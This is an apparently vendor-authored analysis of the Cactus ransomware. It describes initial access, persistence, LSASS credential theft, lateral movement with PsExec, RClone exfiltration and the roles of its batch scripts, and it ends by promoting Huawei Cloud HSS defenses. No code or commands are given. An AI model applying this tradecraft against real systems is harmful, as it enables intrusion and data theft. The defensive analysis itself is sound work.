Inside the Cactus Ransomware: Attack Stages, Code Mechanics, and Defense Strategies

Recent Hot Ransomware Incident

Discovered in 2023, the Cactus ransomware quickly spread across the digital realm, exploiting vulnerabilities (especially VPN flaws) to gain unauthorized access and establish footholds in compromised infrastructure. It uses dynamic encryption methods and a variety of tools to deliver its payload stealthily, targeting organizations in manufacturing and professional services across nine countries.

Cactus Ransomware: Initial Intrusion Phase

The malware primarily gains initial access through exploits such as the Fortinet VPN vulnerability, exposed Qlik Sense installations, and malicious ad‑delivered Danabot trojan.

Cactus Ransomware: Infection and Execution Phase

After infiltration, Cactus performs persistence, privilege escalation, lateral movement, internal data discovery, and disables security software. It establishes SSH backdoors via scheduled tasks, scans the internal network with tools like SoftPerfect, Network Scanner, PSnmap.ps1, and PowerShell commands, and installs legitimate remote‑access tools (Splashtop, AnyDesk, SuperOps RMM) to control compromised hosts.

Credentials are harvested from browser configuration files and the LSASS process. The malware also employs Chisel and Cobalt Strike for encrypted communications. In the final stage, data exfiltration tools such as RClone are used, followed by encryption of the host’s files.

Key batch scripts include f1.bat, which creates an admin user, configures safe‑mode boot, and sets auto‑login, and f2.bat, which extracts the encryption component from a 7‑zip archive, deletes the archive and the executable, and launches the encryptor via PsExec across the internal network.

Cactus Ransomware: Data Exfiltration Phase

The malware uses legitimate cloud‑sync tools like RClone to upload stolen data to external storage.

Ransomware Protection Scheme

Defense is organized around the three attack stages: intrusion, lateral spread, and encryption. Protective measures include pre‑attack identification, real‑time threat detection, automated containment, and post‑attack data recovery.

Pre‑Attack Identification and Defense

Huawei Cloud Host Security Service (HSS) offers risk‑prevention features such as baseline checks, vulnerability management, and container image scanning to reduce the attack surface.

Mid‑Stage Threat Detection

HSS detects brute‑force attempts, vulnerability exploits, webshells, reverse shells, viruses, trojans, and rootkits, providing full‑chain detection of ransomware tactics.

Mid‑Stage Monitoring and Response

Upon detecting ransomware activity, HSS can automatically isolate and eradicate the threat, preventing further spread.

Data Recovery

If encryption occurs, HSS supports one‑click data restoration from cloud backups, enabling rapid business continuity.

Ransomware Defense Recommendations

By analyzing Cactus, we see a complete ransomware lifecycle: intrusion, lateral movement, and encryption. Effective defense should address pre‑attack identification, mid‑stage detection, monitoring with automated response, and post‑incident recovery to minimize impact.